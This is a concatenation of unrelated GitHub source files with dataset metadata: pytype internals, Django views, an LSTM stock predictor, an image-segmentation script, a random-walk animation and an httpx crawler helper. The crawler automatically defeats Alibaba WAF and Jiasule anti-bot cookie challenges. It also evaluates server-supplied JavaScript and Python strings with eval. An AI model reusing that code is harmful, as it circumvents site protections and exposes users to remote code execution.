# Setting it to Any picks up the annotation in another code path.
instance.cls = self.ctx.convert.unsolvable
else:
self.ctx.vm.reinitialize_if_initialized(node, instance)
self.resolved = True
log.info("Resolved late annotation %r to %r", self.expr, self._type)
def set_type(self, typ):
# Used by annotation_utils.sub_one_annotation to substitute values into
# recursive aliases.
assert not self.resolved
self.resolved = True
self._type = typ
def to_variable(self, node):
if self.resolved:
return self._type.to_variable(node)
else:
return _base.BaseValue.to_variable(self, node) # pytype: disable=wrong-arg-types
def instantiate(self, node, container=None):
"""Instantiate the pointed-to class, or record a placeholder instance."""
if self.resolved:
key = (node, _get_container_type_key(container))
if key not in self._resolved_instances:
self._resolved_instances[key] = self._type.instantiate(node, container)
return self._resolved_instances[key]
else:
instance = _instance_base.Instance(self, self.ctx)
self._unresolved_instances.add(instance)
return instance.to_variable(node)
def get_special_attribute(self, node, name, valself):
if name == "__getitem__" and not self.resolved:
container = _base.BaseValue.to_annotation_container(self) # pytype: disable=wrong-arg-types
return container.get_special_attribute(node, name, valself)
return self._type.get_special_attribute(node, name, valself)
def is_late_annotation(self):
return True
def is_recursive(self):
"""Check whether this is a recursive type."""
if not self.resolved:
return False
seen = {id(self)}
stack = [self._type]
while stack:
t = stack.pop()
if t.is_late_annotation():
if id(t) in seen:
return True
seen.add(id(t))
if isinstance(t, mixin.NestedAnnotation):
stack.extend(child for _, child in t.get_inner_types())
return False
class FinalAnnotation(_base.BaseValue):
"""Container for a Final annotation."""
def __init__(self, annotation, ctx):
super().__init__("FinalAnnotation", ctx)
self.annotation = annotation
def __repr__(self):
return f"Final[{self.annotation}]"
def instantiate(self, node, container=None):
return self.to_variable(node)
| google/pytype | pytype/abstract/_typing.py | _typing.py | py | 31,975 | python | en | code | 4,405 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pytype.abstract._instance_base.SimpleValue",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "pytype.abstract._instance_base",
"line_number": 27,
"usage_type": "name... |
71845863784 | from django.http import HttpResponse
from django.template import loader
def index(request):
template = loader.get_template('pages/page_index.html')
context = {}
return HttpResponse(template.render(context, request))
def page(request):
template = loader.get_template('pages/page_display.html')
context = {
'page_id': request.GET['page_id']
}
print(context['page_id'])
return HttpResponse(template.render(context, request))
| craig-glass/epic_django | pages/views.py | views.py | py | 466 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.template.loader.get_template",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.template.loader",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 8,
"usage_type": "call"
},
{
"... |
20465270702 | # -*- coding: utf-8 -*-
# @Project : CrawlersTools
# @Time : 2022/6/21 17:08
# @Author : MuggleK
# @File : base_requests.py
import json
import random
import re
import time
from chardet import detect
from httpx import Client, Response
from loguru import logger
from CrawlersTools.requests.proxy import get_proxies
from CrawlersTools.requests.random_ua import UserAgent
class BaseRequests(object):
"""
A Rquests Class base on httpx
Usage:
```python
>>> base_requests = BaseRequests().base_requests
>>> response = base_requests('https://example.org')
```
"""
def base_requests(
self,
url: str,
session: object = None,
headers=UserAgent(),
method: str = "get",
proxies: dict = None,
proxy_url: str = None,
http2: bool = False,
encoding: str = None,
retry: int = 3,
**kwargs
) -> Response:
"""
内置ali_waf & 加速乐解密
:param url: 请求链接
:param session: 维持session可从外部传入
:param headers: 请求头
:param method: 具体请求方式
:param proxies: ip代理,配合proxy_url可失效自动切换
:param proxy_url: 获取代理链接
:param http2: 是否使用http2.0协议
:param retry: 请求重试次数,默认3次
:param encoding: 指定编码,默认detect解析,效果同requests的apparent_encoding
:param kwargs: 请求时需携带的其他参数
:return: Response
:exception: 1.代理失效&超过重试次数返回None 2.waf或加速乐解密失败返回None
"""
for _ in range(retry):
try:
proxies = proxies if proxies else get_proxies(proxy_url, http2=True)
session = session or Client(
http2=http2,
headers=headers,
proxies=proxies,
timeout=kwargs.get("timeout", 20),
verify=kwargs.get("verify", True),
follow_redirects=kwargs.get("allow_redirects", False)
)
response = session.request(
method=method.lower(),
url=url,
headers=headers,
content=kwargs.get("content"),
data=kwargs.get("data"),
files=kwargs.get("files"),
json=kwargs.get("json"),
params=kwargs.get("params"),
timeout=kwargs.get("timeout", 20),
follow_redirects=kwargs.get("allow_redirects", False)
)
response.encoding = encoding if encoding else detect(response.content)['encoding'] # chardet 更准确
if 200 <= response.status_code < 300 or response.status_code == 412:
if 'arg1=' in response.text:
acw_tc_cookie = f'acw_tc={session.cookies.get("acw_tc")};'
headers["Cookie"] = headers["Cookie"] + acw_tc_cookie if headers.get("Cookie") else acw_tc_cookie
reg_arg1 = re.findall("var arg1='(.*)';", response.text)[0]
arg2 = self.ali_waf(reg_arg1)
headers['cookie'] += f'acw_sc__v2={arg2}'
continue
return response
elif response.status_code == 521:
if 'document.cookie' in response.text:
cookie_key = [key for key in list(session.cookies.keys()) if key.startswith("__jsluid")][0]
headers["Cookie"] = headers["Cookie"] if headers.get("Cookie") else f'{cookie_key}={session.cookies.get(cookie_key)};'
headers["Cookie"] += f'{self.process_fuck_js(response.text)};'
continue
elif 'chars' in response.text:
__jsl_clearance_s = self.process_clearance(response.text)
headers["Cookie"] = '='.join(headers["Cookie"].split('=')[:-1]) + f'={__jsl_clearance_s};'
continue
else:
proxies = None
time.sleep(random.uniform(0, 1))
continue
except Exception as err:
logger.error(f'url:{url} error:{err} proxies:{proxies}')
proxies = None
time.sleep(random.uniform(0, 1))
continue
@staticmethod
def ali_waf(arg1):
"""
acw_sc__v2算法
:param arg1:
:return:
"""
list1 = [15, 35, 29, 24, 33, 16, 1, 38, 10, 9, 19, 31, 40, 27, 22, 23, 25, 13, 6, 11, 39, 18, 20, 8, 14, 21, 32,
26, 2, 30, 7, 4, 17, 5, 3, 28, 34, 37, 12, 36]
dict1 = {}
for i in range(len(arg1)):
string = arg1[i]
for j in range(len(list1)):
if list1[j] == i + 1:
dict1[j] = string
str1 = ''.join([dict1.get(i) for i in range(40)])
str1_list = list(str1)
str2 = "3000176000856006061501533003690027800375"
str2_list = list(str2)
str4 = ''
for m in range(0, len(str1_list), 2):
int1 = int(''.join(str1_list[m:m + 2]), 16)
int2 = int(''.join(str2_list[m:m + 2]), 16)
str3 = str(hex(int1 ^ int2))[2:]
if len(str3) == 1:
str3 = '0' + str3
str4 += str3
return str4
@staticmethod
def process_fuck_js(js_text):
import execjs
js_text = js_text.split(';location.href=loc')[0].split('document.cookie=')[-1]
r = execjs.eval(js_text).split(';')[0]
return r
@staticmethod
def process_clearance(html):
import hashlib
data = json.loads(re.findall(r'go\((.*?)\)', html)[1])
chars_length = len(data.get('chars'))
for i in range(chars_length):
for j in range(chars_length):
result = data.get('bts')[0] + data.get('chars')[i] + data.get('chars')[j] + data.get('bts')[1]
b = eval('hashlib.{}()'.format(data.get('ha')))
b.update(result.encode(encoding='utf-8'))
res = b.hexdigest()
if res == data.get('ct'):
return result
| MuggleK/CrawlersTools | CrawlersTools/requests/base_requests.py | base_requests.py | py | 6,417 | python | en | code | 16 | github-code | 36 | [
{
"api_name": "CrawlersTools.requests.random_ua.UserAgent",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "CrawlersTools.requests.proxy.get_proxies",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "httpx.Client",
"line_number": 64,
"usage_type": "call... |
27775098322 | import matplotlib.pyplot as plt
import numpy as np
# Create some data to plot
x = np.arange(5)
y = [2, 5, 3, 8, 10]
# Set the xticks with labels that include LaTeX and \n
xticks = [r'Label 1', r'Label$_{2}\n$with superscript $x^2$', r'Label 3', r'Label$_{4}$', r'Label 5']
plt.plot(x, y)
plt.xticks(x, xticks, rotation=0)
# Enable LaTeX rendering
plt.rc('text', usetex=True)
# Show the plot
plt.show()
| JinyangLi01/Query_refinement | Experiment/TPCH/running_time/try.py | try.py | py | 406 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplo... |
36109925973 | #!/usr/bin/env python3
#_main_.py
import writer
import getimage
import argparse
import os
from time import sleep
import gimmedahandler #import shit
##set up the parser
parser = argparse.ArgumentParser(
description= "A simple bot to place pixels from a picture to whatever you want \n Please note to write files with their according filetypes",
epilog= "Have fun with my Bot",
prefix_chars="-/",
add_help=False
)
# add arguments to the parser
parser.add_argument("-?", "--help", action="help", help="Show this help message")
parser.add_argument("--User_Interface", "-ui", action="store_true", dest="UI", help="Wether or not you will use the built-in User Interface. If given, will ignore all other parameters.")
parser.add_argument("-s", "--silence", "-s", action="store_true", dest="silence", help="If this parameter is given, the Program will not output anyting (exept fatal errors)")
parser.add_argument("-nc", "--no_colors", action="store_true", dest="nc", help="Wether to not use custom text coloring(e.g. if the output is saved to a file)")
parser.add_argument("-p", "--picture", type=str, dest="inpath", action="store", help="The path of the picture you want the Bot to draw.")
parser.add_argument("-h", "--handler", type=str, dest="handler", action="store", help="The file name of the handler that the Bot will use to draw your image.")
parser.add_argument("-sx", "--startx", type=int, dest="startx", action="store", help="The x coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-sy", "--starty", type=int, dest="starty", action="store", help="The y coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ex", "--endx", type=int, dest="endx", action="store", help="The x coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ey", "--endy", type=int, dest="endy", action="store", help="The y coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
args = parser.parse_args() #parse the given arguments
#print("hehe", flush=True)
if args.UI and args.silence:
while True:
sleep(1)
#how you gonna use a invisible UI???
if args.nc: #creating a temporary file so that the toolset module knows wether or not to use custom colouring
f = open("nc.temp", "x")
f.close()
if args.UI == False and args.inpath == None and args.handler == None and args.startx == None and args.starty == None:
parser.parse_args(["-?"]) #return the help page if no args are given
#print(args.handler)
if args.UI:
image, size = getimage.imageprompt(args.UI) #getting the image stuff
handler = gimmedahandler.gethandler(args.handler, args.UI) #retriveving the handler
#print(handler)
startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) # retrieving the info about the canvas coordinates from the user
writer.write(image, handler, startx, starty, endx, endy, size, args.UI, args.silence) #giving shit to the writing algorithms
if args.nc: #removing the temporary file
os.remove("./nc.temp")
else:
handler = gimmedahandler.gethandler(args.handler, args.UI) #prepping handler
image, size = getimage.imageprompt(args.UI, args.inpath) #prepping the given img
startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) #checking the coords
writer.write(image, handler, startx, starty, endx, endy ,size, args.UI, args.silence) #writing the image to the canvas
if args.nc: #removing the temporary file
os.remove("./nc.temp")
| a-usr/pixelbot | _main_.py | _main_.py | py | 3,718 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "getimage.imageprompt",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "gimmedahandle... |
536521380 | import os
import cv2
import numpy as np
import skimage.exposure as sk_exposure
import matplotlib.pyplot as plt
from skimage.io import imshow, imread
from skimage.color import rgb2hsv, hsv2rgb
from skimage import color
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import generate_binary_structure, binary_erosion
low=40
high=60
kernel = np.ones((4,4), np.uint8)
path_image_contour= 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Paint/001'
FILENAME='C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/006/TCGA-001-tile-r12-c5-x4096-y11264-w1024-h1024.PNG' #image can be in gif jpeg or png format
path_image_final = 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/Image_seg'
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#img=cv2.imread(FILENAME)
#imgplot = plt.imshow(img)
#plt.show()
kernel_dil = np.ones((3,3), np.uint8)
#def contour_img (path_image_contour) :
list_img = os.listdir(path_image_contour)
for annot_num, annotation_tif in (enumerate(list_img)):
imagepath =path_image_contour+'/'+ annotation_tif
print(annotation_tif)
img = cv2.imread(imagepath,1)
p= os.path.basename(annotation_tif)
name1 = os.path.splitext(p)[0]
fname = name1 + '.png'
path_image_final_1 = os.path.join(path_image_final,fname)
img= cv2.resize(img, (364,364), interpolation = cv2.INTER_AREA)
cv2.imshow('',img)
cv2.waitKey(0)
img = cv2.erode(img, kernel_dil, iterations=1)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
img_fin = np.zeros(img.shape, dtype=np.uint8)
# img_hsv = cv2.dilate(img_hsv, kernel, iterations=1)
lower_mask = img_hsv [:,:,0] > 90
upper_mask = img_hsv [:,:,0] < 130
saturation = img_hsv [:,:,1] > 100
mask = upper_mask*lower_mask *saturation
red = img[:,:,0]*mask
green = img[:,:,1]*mask
blue = img[:,:,2]*mask
red_girl_masked = np.dstack((red,green,blue))
red_girl_masked = cv2.cvtColor(red_girl_masked, cv2.COLOR_BGR2GRAY)
cv2.imshow('',red_girl_masked)
cv2.waitKey(0)
ret,threshNuclei = cv2.threshold(red_girl_masked,0,255,cv2.THRESH_BINARY)
contoursNuclei, hierarchy = cv2.findContours(threshNuclei,cv2.RETR_TREE ,cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
# cv2.imshow('',img)
# cv2.waitKey(0)
for c in zip(contoursNuclei, hierarchy[0]):
if cv2.contourArea(c[0]) > 200:
if c[1][3] != -1:
temp = np.zeros(img.shape, dtype=np.uint8)
cv2.fillPoly(temp, pts=[c[0]], color=(255, 255, 255))
# cv2.imshow('',temp)
# cv2.waitKey(0)
masked_image = cv2.bitwise_and(img, temp)
Mask_black = cv2.bitwise_not(masked_image)
mask_ = cv2.bitwise_not(temp)
masked_image_ = cv2.bitwise_or(masked_image, mask_)
temp_1 = cv2.cvtColor(temp, cv2.COLOR_BGR2GRAY )
#image_max = ndi.maximum_filter(masked_image_, size=20, mode='constant')
dst = cv2.cornerHarris(temp_1,12,13,0.20)
dst = cv2.dilate(dst,None)
masked_image_shape = (masked_image_[dst>0.01*dst.max()]).shape
masked_image_[dst>0.01*dst.max()]=[0,0,255]
# cv2.imshow('dst',masked_image_)
# cv2.waitKey(0)
print( masked_image_shape[0])
if masked_image_shape[0]< 290:
img_fin = img_fin+temp
elif len(masked_image_[dst>0.09*dst.max()])<210:
img_fin = img_fin+temp
# cv2.imshow('',img_fin)
# cv2.waitKey(0)
cv2.imwrite(path_image_final_1, img_fin)
cv2.imshow('',img_fin)
cv2.waitKey(0)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
| LauraMarin/Tesis_2023 | Unet_Nuclei_feature/Contour_seg.py | Contour_seg.py | py | 4,106 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.ones",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.ones",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number... |
24426403241 | #!/usr/bin/env python
import sys
import os
from distutils.core import setup
from distutils.command.install import install, write_file
from distutils.command.install_egg_info import to_filename, safe_name
from functools import reduce
class new_install(install):
def initialize_options(self):
install.initialize_options(self)
def run(self):
install.run(self)
# hack to remove old module
old_path = os.path.join(self.install_libbase, "playitslowly", "playitslowly.py")
for p in (old_path + x for x in ("o", "c", "")):
if os.path.exists(p):
self.execute(os.unlink, (p, ), "Removing old file %r" % p)
# write install-info
basename = "%s-py%s.install-info" % (
to_filename(safe_name(self.distribution.get_name())),
sys.version[:3]
)
install_info = os.path.join(self.install_libbase, basename)
outputs = self.get_outputs()
if self.root: # strip any package prefix
root_len = len(self.root)
for counter in range(len(outputs)):
outputs[counter] = outputs[counter][root_len:]
self.execute(write_file,
(install_info, outputs),
"writing install-info to '%s'" % install_info)
def ls_r(dir):
def do_reduce(a, b):
files = []
for f in b[2]:
files.append(os.path.join(b[0], f))
a.append((b[0], files))
return a
return reduce(do_reduce, os.walk(dir), [])
kwargs = {
'cmdclass': {'install': new_install},
'name': 'playitslowly',
'version': "1.5.1",
'description': 'A tool to help you when transcribing music. It allows you to play a piece of music at a different speed or pitch.',
'author': 'Jonas Wagner',
'author_email': 'jonas@29a.ch',
'url': 'http://29a.ch/playitslowly/',
'packages': ['playitslowly'],
'scripts': ['bin/playitslowly'],
'options': {'py2exe':{
'packages': 'encodings',
'includes': 'cairo, pango, pangocairo, atk, gobject',
'dist_dir': 'dist/win32',
'optimize': 2,
}},
'data_files': ls_r('share'),
'license': 'GNU GPL v3',
'classifiers': [
'Environment :: X11 Applications :: GTK',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Natural Language :: English',
'Operating System :: POSIX',
'Programming Language :: Python',
]
}
try:
import py2exe
kwargs['windows'] = [{'script': 'bin/playitslowly',
'icon_resources': [(1, 'playitslowly.ico')],
'dest_base': 'playitslowly'}]
except ImportError:
pass
setup(**kwargs)
| jwagner/playitslowly | setup.py | setup.py | py | 2,789 | python | en | code | 96 | github-code | 36 | [
{
"api_name": "distutils.command.install.install",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "distutils.command.install.install.initialize_options",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "distutils.command.install.install",
"line_number": 12,... |
13957012079 | import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from numpy.random import random_integers
import os
import pandas as pd
from math import floor
# Matplotlib fig params
mpl.rcParams['figure.figsize'] = (8, 6)
mpl.rcParams['axes.grid'] = False
# Enable eager for easy to use TF
#tf.enable_eager_execution()
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def univariate_data(dataset, start_index, end_index, history_size, target_size):
data = []
labels = []
start_index = start_index + history_size
if end_index is None:
end_index = len(dataset) - target_size
for i in range(start_index, end_index):
# Every group of 20
indices = range(i - history_size, i)
# Reshape data from (history_size,) to (history_size, 1)
# Data is now groups of 20 records - x data
data.append(np.reshape(dataset[indices], (history_size, 1)))
# Labels = the day to predict in question - y data
labels.append(dataset[i + target_size])
return np.array(data), np.array(labels)
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def normalizeData(TRAIN, uni_data):
# Getting training data metrics
uni_train_min = np.amin(uni_data[:TRAIN])
uni_train_max = np.amax(uni_data[:TRAIN])
uni_data = (uni_data - uni_train_min) / uni_train_max
return uni_data, uni_train_min, uni_train_max
def trainValSplit(uni_data, TRAIN, HISTORIC_REC, TARGET_REC):
# This will be:
# x = previous records
# y = next record prediction
x_train_uni, y_train_uni = univariate_data(uni_data, 0, TRAIN,
HISTORIC_REC,
TARGET_REC)
x_val_uni, y_val_uni = univariate_data(uni_data, TRAIN, None,
HISTORIC_REC,
TARGET_REC)
return x_train_uni, y_train_uni, x_val_uni, y_val_uni
def create_time_steps(length):
return list(range(-length, 0))
def show_plot(plot_data, delta, title):
labels = ['History', 'True Future', 'Model Prediction']
marker = ['.-', 'rx', 'go']
time_steps = create_time_steps(plot_data[0].shape[0])
if delta:
future = delta
else:
future = 0
plt.title(title)
for i, x in enumerate(plot_data):
if i:
plt.plot(future, plot_data[i], marker[i], markersize=10,
label=labels[i])
else:
plt.plot(time_steps, plot_data[i].flatten(), marker[i], label=labels[i])
plt.legend()
plt.xlim([time_steps[0], (future + 5) * 2])
plt.xlabel('Time-Step')
return plt
def showSampleExample(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val]], 0, 'Sample Example')
plt.show()
def baseline(history):
return np.mean(history)
def showBaselinePrediction(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val], baseline(x_train_uni[val])], 0,
'Baseline Prediction Example')
plt.show()
def batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni):
train_univariate = tf.data.Dataset.from_tensor_slices((x_train_uni, y_train_uni))
train_univariate = train_univariate.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True).repeat()
val_univariate = tf.data.Dataset.from_tensor_slices((x_val_uni, y_val_uni))
val_univariate = val_univariate.batch(BATCH_SIZE, drop_remainder=True).repeat()
return train_univariate, val_univariate
def createModel(tensorShape):
simple_lstm_model = tf.keras.models.Sequential([
tf.keras.layers.LSTM(8, input_shape=tensorShape),
tf.keras.layers.Dense(1)
])
simple_lstm_model.compile(optimizer='adam', loss='mae')
return simple_lstm_model
# for x, y in val_univariate.take(1):
# print(simple_lstm_model.predict_on_batch(x).shape)
##### 2
def CreateModel(train_data_shape):
model = createModel(train_data_shape[-2:])
return model
##### 1
def PrepTrainData(location):
HISTORIC_REC = 30
TARGET_REC = 0
BATCH_SIZE = 1
BUFFER_SIZE = 200
data = getData(location)
TRAIN = floor(0.8 * len(data))
ndata, nmin, nmax = normalizeData(TRAIN, data)
x_train_uni, y_train_uni, x_val_uni, y_val_uni = trainValSplit(ndata, TRAIN, HISTORIC_REC, TARGET_REC)
train_univariate, val_univariate = batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni)
return train_univariate, val_univariate, x_train_uni.shape
#### 3
def TrainModel(model, train_univariate, val_univariate, filename):
EVALUATION_INTERVAL = 200
EPOCHS = 50
model.fit(train_univariate, epochs=EPOCHS,
steps_per_epoch=EVALUATION_INTERVAL,
validation_steps=50,
validation_data=val_univariate)
model.save("trained/trained_model"+filename)
return model
def LoadModel(m_name):
model = tf.keras.models.load_model(m_name)
return model
def GetPrediction(dataset, model, forecast):
if forecast > 30:
forecast = 30
# plt.plot(data)
hdata, nmin, nmax = normalizeData(len(dataset), dataset)
hdata = hdata[-30:]
p_ya = np.array([])
p_x = np.arange(len(dataset), len(dataset) + forecast)
for x in range(0, forecast):
hdata = hdata.reshape(1, 30, 1)
y_hat = model.predict(hdata)
y_hat = Noys(y_hat)
# if abs(y_hat - p_ya[-1]) > 0.5*y_hat:
# y_hat = y_hat/5
hdata = np.append(hdata, y_hat)
hdata = np.delete(hdata, 0)
p_ya = np.append(p_ya, y_hat)
p_ya = p_ya * nmax + nmin
diffy = dataset[-1] - p_ya[0]
p_ya = p_ya + diffy
# plt.plot(p_x, p_ya)
# plt.show()
return np.ndarray.tolist(p_ya)
def Noys(y_hat):
noys = random_integers(-2, 2)
if noys % 2 == 0:
if noys > 1:
y_hat = y_hat + y_hat*0.30
elif noys < 1:
y_hat = y_hat - y_hat*0.30
else:
if noys > 1:
y_hat = y_hat + y_hat*0.15
elif noys < 1:
y_hat = y_hat - y_hat*0.15
return y_hat
def GetTrainedModel(path: str):
t_m = LoadModel(path)
return t_m
# GetPrediction('../data/AAPL.csv', t_m, 20)
def TrainSet():
model = CreateModel((30, 1))
for filename in os.listdir("/Users/christopherochs/financial-forecasting-api/models/data"):
if filename.endswith(".csv"):
print('../data/' + filename)
train, val, t_shape = PrepTrainData('../data/' + filename)
model = TrainModel(model, train, val, filename)
def TestModels(filename, dataname):
model = LoadModel('trained/'+filename)
d = getData('../data/' + dataname)
d = d[-100:]
p_x = np.arange(len(d), len(d) + 5)
y = GetPrediction(d, model, 5)
plt.title(filename + " on " + dataname)
plt.plot(d)
plt.plot(p_x, y)
plt.show()
| ptallo/financial-forecasting-api | models/univarmodel.py | univarmodel.py | py | 7,529 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.rcParams",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rcParams",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "num... |
9156690869 | import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import random
from matplotlib.animation import FuncAnimation
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
def randomwalk3D(n, angle_degrees, escape_radius=100):
x, y, z = np.zeros(n), np.zeros(n), np.zeros(n)
angle_rad = np.radians(angle_degrees)
current_direction = np.array([1, 0, 0]) # Initial direction (e.g., to the right)
def density(x, y, z):
# Define a density function that varies with position
# You can modify this function to create your desired gradient
return 1.0 / (1.0 + np.sqrt(x**2 + y**2 + z**2))
for i in range(1, n):
# Calculate the distance from the origin (sun)
distance = np.sqrt(x[i - 1]**2 + y[i - 1]**2 + z[i - 1]**2)
if distance > escape_radius:
# If outside the escape radius, move straight in the current direction
x[i] = x[i - 1] + current_direction[0]
y[i] = y[i - 1] + current_direction[1]
z[i] = z[i - 1] + current_direction[2]
else:
# Generate a random reflection angle within the specified range
reflection_angle = np.random.uniform(-angle_rad, angle_rad)
# Generate a random axis of rotation (x, y, or z)
axis = random.choice([0, 1, 2])
# Create a 3D rotation matrix based on the chosen axis and angle
rotation_matrix = np.identity(3)
if axis == 0:
rotation_matrix = np.dot(np.array([[1, 0, 0],
[0, np.cos(reflection_angle), -np.sin(reflection_angle)],
[0, np.sin(reflection_angle), np.cos(reflection_angle)]]), rotation_matrix)
elif axis == 1:
rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), 0, np.sin(reflection_angle)],
[0, 1, 0],
[-np.sin(reflection_angle), 0, np.cos(reflection_angle)]]), rotation_matrix)
else:
rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), -np.sin(reflection_angle), 0],
[np.sin(reflection_angle), np.cos(reflection_angle), 0],
[0, 0, 1]]), rotation_matrix)
# Apply the rotation to the current direction
current_direction = np.dot(rotation_matrix, current_direction)
# Adjust the probability of reflection based on density
reflection_prob = density(x[i - 1], y[i - 1], z[i - 1])
if np.random.rand() > reflection_prob:
current_direction = -current_direction # Reflect back
# Update the position
x[i] = x[i - 1] + current_direction[0]
y[i] = y[i - 1] + current_direction[1]
z[i] = z[i - 1] + current_direction[2]
return x, y, z
# Number of iterations
num_iterations = int(1e3)
# Lists to store escape times for each iteration
escape_times = []
iteration_numbers = []
num_escapes = 0
# Define the sun_radius
sun_radius = int(1e2)
# 3D figure and axis for the entire plot
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111, projection='3d')
# List to store the line objects for each frame
all_lines = []
# Function to initialize the animation
def init():
for line in all_lines:
line.set_data([], [])
line.set_3d_properties([])
average_escape_text.set_text('')
escape_count_text.set_text('')
return all_lines + [average_escape_text, escape_count_text]
# Function to calculate and update the average escape time
def update_average_escape(iteration):
if len(escape_times) > 0:
average_escape = sum(escape_times) / len(escape_times)
average_escape_text.set_text(f'Average Counts to Escape: {average_escape:.2f}')
else:
average_escape_text.set_text('')
return average_escape_text,
# Function to animate frames and define escape parameters
def animate(iteration):
global num_escapes # Add this line to indicate num_escapes is a global variable
n_steps = int(5e4)
reflection_angle_degrees = random.uniform(0, 180)
x_data, y_data, z_data = randomwalk3D(n_steps, reflection_angle_degrees)
distances = np.sqrt(x_data**2 + y_data**2 + z_data**2)
escape_radius = int(1e2)
escape_time = np.argmax(distances > escape_radius)
if escape_radius < escape_time:
num_escapes += 1
escape_times.append(escape_time)
iteration_numbers.append(iteration + 2)
line, = ax.plot(x_data, y_data, z_data, '-', linewidth=0.5, alpha=0.5, color=np.random.rand(3,))
all_lines.append(line)
# Update the average escape text
average_escape_text.set_text(f'Mean escape counts: {np.mean(escape_times):.2f}')
# Update the escape count text
escape_count_text.set_text(f'Escapes: {num_escapes} / {n_steps}')
iteration_count_text.set_text(f'Iteration: {iteration}')
return all_lines + [average_escape_text, escape_count_text, iteration_count_text]
# Create a text annotation for displaying average escape time and counts
average_escape_text = ax.text2D(0.005, 0.005, '', transform=ax.transAxes, fontsize=10, color='black')
escape_count_text = ax.text2D(0.005, 0.035, '', transform=ax.transAxes, fontsize=10, color='black')
iteration_count_text = ax.text2D(0.005, 0.07, '', transform=ax.transAxes, fontsize=10, color='black')
# Create the animation
ani = FuncAnimation(fig, animate, frames=num_iterations, init_func=init, interval = 0.1, blit=True, repeat=False)
# Create a sphere to represent the Sun
u = np.linspace(0, 2 * np.pi, 100)
v = np.linspace(0, np.pi, 100)
x_sun = sun_radius * np.outer(np.cos(u), np.sin(v))
y_sun = sun_radius * np.outer(np.sin(u), np.sin(v))
z_sun = sun_radius * np.outer(np.ones(np.size(u)), np.cos(v))
ax.plot_surface(x_sun, y_sun, z_sun, color='yellow', alpha=0.3)
# Define Plot
ax.set_title('Psudo Sun Simulator')
ax.set_xlim(-150, 150)
ax.set_ylim(-150, 150)
ax.set_zlim(-150, 150)
plt.show()
# Create a histogram with 1000 bins
histogram = input("Histogram plot? (y or any other key for no): ")
if histogram == 'y':
plt.figure()
plt.hist(escape_times, bins=1000, color='blue', alpha=0.7)
plt.xlabel('Escape Time')
plt.ylabel('Frequency')
plt.title('Escape Time Histogram')
plt.show()
| shafransky93/PsudoSunSimulator | randwalk.py | randwalk.py | py | 6,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.radians",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 11,
"usage_type": "call"
},
{
